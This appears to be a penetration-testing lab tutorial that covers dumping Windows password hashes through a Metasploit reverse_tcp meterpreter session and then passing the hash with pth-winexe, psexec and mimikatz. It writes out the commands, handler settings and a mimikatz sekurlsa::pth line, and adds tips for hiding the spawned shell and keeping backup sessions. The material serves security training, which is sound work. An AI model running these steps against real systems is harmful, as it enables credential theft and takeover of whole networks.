What tools are used to get the hash?

To extract the password hashes from a victim, some hackers will use Metasploit. By using Metasploit, a hacker can create a reverse_tcp payload and use it to establish a meterpreter session on the victim's device. Once a meterpreter session is created, the hacker can dump the contents of the SAM by typing the command hashdump. Before hashdump can be executed successfully, the attacker must type getsystem and getprivs to escalate their level of access on the victim's device. The following lab demonstrates how this is done. Screenshots are provided to help you follow along.

Step one involves creating a payload to send to the victim. For this lab, we will use msfvenom to create a meterpreter reverse_tcp payload:

The preceding screenshot displays the successful creation of a reverse_tcp payload.

After we have created the payload, the second step is to set up the multi-handler. We will need to set the payload, LHOST, and LPORT for the multi-handler. Once the options are set, we type exploit to start the handler. Once the victim activates the payload, a meterpreter session will be established. The following screenshot demonstrates what an established session looks like:

The third step is to escalate system privileges on the victim machine. We need to type two commands. The first command is getsystem and the second one is getprivs. Having escalated our system privileges, we can now execute the command hashdump. The following screenshot shows the successful escalation of system privileges on the victim machine:

The fourth and final step is to type the command run hashdump. By using this command, we can get the hashed passwords of the user and administrator accounts. A hacker would use these hashes to gain access to other devices on the domain. On a large enterprise network you would normally see hundreds or even thousands of usernames and password hashes. The following screenshot displays what the hashed passwords look like:

Now that we have successfully captured the password hashes, we can move on to the next lab. In this second lab, we will demonstrate how to pass the hash, allowing access to another device. Kali Linux comes with a Pass the Hash toolkit. This toolkit is excellent at executing pass the hash attacks. Other great tools that can be used are mimikatz and PsExec.

The next lab will demonstrate how to use several different tools to pass the hash. The first tool is the Pass the Hash toolkit. We will type pth-winexe -U followed by the harvested credentials. The following screenshot shows the command:

Another way to pass the hash is to use a tool called PsExec. This tool can be found within Metasploit. The setup for PsExec is the same as the multi-handler setup:

  1. We start by typing msfconsole.
  2. We then type use exploit/windows/smb/psexec. The next screen will ask us to set the options for the listener.
  3. First we set the payload by typing set payload windows/meterpreter/reverse_tcp.
  4. Now we set LHOST to 192.168.57.130, LPORT to 443, and RHOST to 192.168.57.131. The RHOST IP is the victim device.
  5. The final option to set is the SMB password.
  6. Type set SMBPass and enter the hash for the device you wish to gain access to.
  7. Type exploit and you will see a meterpreter session established to the victim's device.

Hackers will often establish multiple sessions to maintain access to a device. If one session dies, they can use two or three backup sessions to continue with the attack.

The following screenshot shows a successful meterpreter session being established on a second device by passing the hash:

The third pass the hash tool we will demonstrate is called mimikatz. This is a great tool to use for passing the hash. mimikatz is classified as a post-exploitation tool. It was created by Benjamin Delpy. mimikatz has many features besides passing the hash. For example, if you want to obtain the hashes through mimikatz, use the command mimikatz_command -f hashdump::hashes. The following screenshot demonstrates what this command looks like:

For this example, we will be using a module found within mimikatz called sekurlsa. First type mimikatz, and then type sekurlsa::pth /user:Administrator /domain:ethicalhaks.local /ntlm:cc36cf7a8514893efccd332446158b1a /run:cmd. The cmd argument at the end of the command will open a shell on the victim machine. You can also type -w hidden after cmd to hide the shell being opened on the victim's device. One interesting characteristic of mimikatz is that, since its creator is from France, many of the module description pages are in French instead of English. The following screenshot shows what one of the module pages looks like:

The following screenshot shows a meterpreter session established on a second device by mimikatz. Once we have a second meterpreter session open, we can dump the hashes of the domain the second device is connected to. This is an excellent technique to quickly compromise multiple domains:
